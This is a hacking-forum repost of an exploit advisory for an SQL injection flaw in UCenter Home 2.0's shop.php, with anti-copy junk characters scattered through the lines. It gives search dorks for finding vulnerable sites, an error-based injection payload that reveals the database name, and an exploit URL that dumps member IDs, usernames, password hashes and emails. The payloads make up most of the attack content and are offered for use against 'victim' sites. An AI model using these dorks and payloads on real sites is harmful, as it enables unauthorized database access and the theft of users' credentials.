找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2054|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

( S+ I: A! N/ X) y7 I4 {/ s__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  + d2 F' h% \+ l% J! V! V$ i4 e

$ j3 K4 ~! ?& v# H5 D( x" w                                 " o+ \9 R3 J2 c: Q( x# x5 S5 Y0 s* F

( i9 r' z3 z3 F* ^*/ Author : KnocKout  
4 ?. ]3 [. t" h- w8 ^
3 b' P- E. `2 v9 z0 e. _*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
! g" e3 c# ~3 b( V$ y
! c2 V# N/ A2 J7 Z& S*/ Contact: knockoutr@msn.com  
4 s8 a4 A7 q! |; P) B8 g0 S7 L( K! Z3 o
*/ Cyber-Warrior.org/CWKnocKout  
+ l/ M9 J- @4 r0 K4 f2 ~& g; E" E/ i) f( y. F9 Y7 X
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  8 U4 M8 u( \0 d, G2 I6 W

1 Q, `4 }3 P' h2 \0 {; F% KScript : UCenter Home  
9 D+ M: ?7 ^+ `2 T0 Z( \( u. f6 F, Y+ |3 o, h, H8 S; |
Version : 2.0  ) q8 f5 D/ b$ ~5 M

3 `/ \5 _3 @2 Y& JScript HomePage : http://u.discuz.net/  + }. ^- U" u. t* _; M

  i2 _. o7 M5 p( A5 L4 m/ h__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  % @, w+ c  q- p" R* Z
9 [' U; f! V: K. ~) y
Dork : Powered by UCenter inurl:shop.php?ac=view  
9 \; B* `3 [2 o+ B) R! L( a9 H- z$ C3 y( m  l' ~) \
Dork 2 : inurl:shop.php?ac=view&shopid=  ! }. q& i3 F- t: C& l' l( Q* b6 W
$ B0 s5 E0 G4 O4 ]
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
( h8 \& ~) h+ ~9 _' i) z) Q5 W; y8 l" D) @
Vuln file : Shop.php  : V$ Z: r0 S! }. [; C5 i- S
' a  r9 K4 n2 O1 D) h: Q4 E- V
value's : (?)ac=view&shopid=  
, V. u! U* L6 O+ o
! G- i9 |2 w2 l1 U+ _" EVulnerable Style : SQL Injection (MySQL Error Based)  : Z8 t2 v& @2 F9 y/ N( m$ Y7 K

1 p( c8 l) f% j( m- ~/ z/ X' fNeed Metarials : Hex Conversion  
0 y1 o( i* G; J6 z/ _: E% p% Z8 B! ?4 s9 T% \
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ( s4 M5 m9 R' i  l: t5 }
) y* w! I0 [! c! V" @2 I
Your Need victim Database name.   $ V# \# [) w: y% G6 s

3 M5 |$ m# `) x7 Q" ofor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  5 E# v# U, B2 m2 Z
! h# v- b# E: O" _7 F: F6 h
..  4 |; z2 ?# k# B9 Z

1 @0 C: h) z7 G* j  ADB : Okey.  
; o( q* q( ?0 x& V6 ~" x
6 e* u2 b1 I+ Z$ {0 ]* Pyour edit DB `[TARGET DB NAME]`  
$ t5 i' o3 y/ R" @5 E+ |! Q; c& v: |; w7 l% x4 b) r! T7 c
Example : 'hiwir1_ucenter'  % {) u$ Z' f& ^5 z( r
6 T- g) t% \# I5 W& E# ?2 _5 Y' {  F
Edit : Okey.  
9 B# e/ m0 n! d2 f- f/ `
5 J0 `$ O; k: T1 gYour use Hex conversion. And edit Your SQL Injection Exploit..  8 k2 D5 j* I3 |4 Y) r8 w" ?) p

4 g* a/ e7 k, G9 a/ a   ) l$ i5 I! b  Q- g9 A0 m

' k  S2 I' O' p. \Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  ' j% R' [% ~; `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表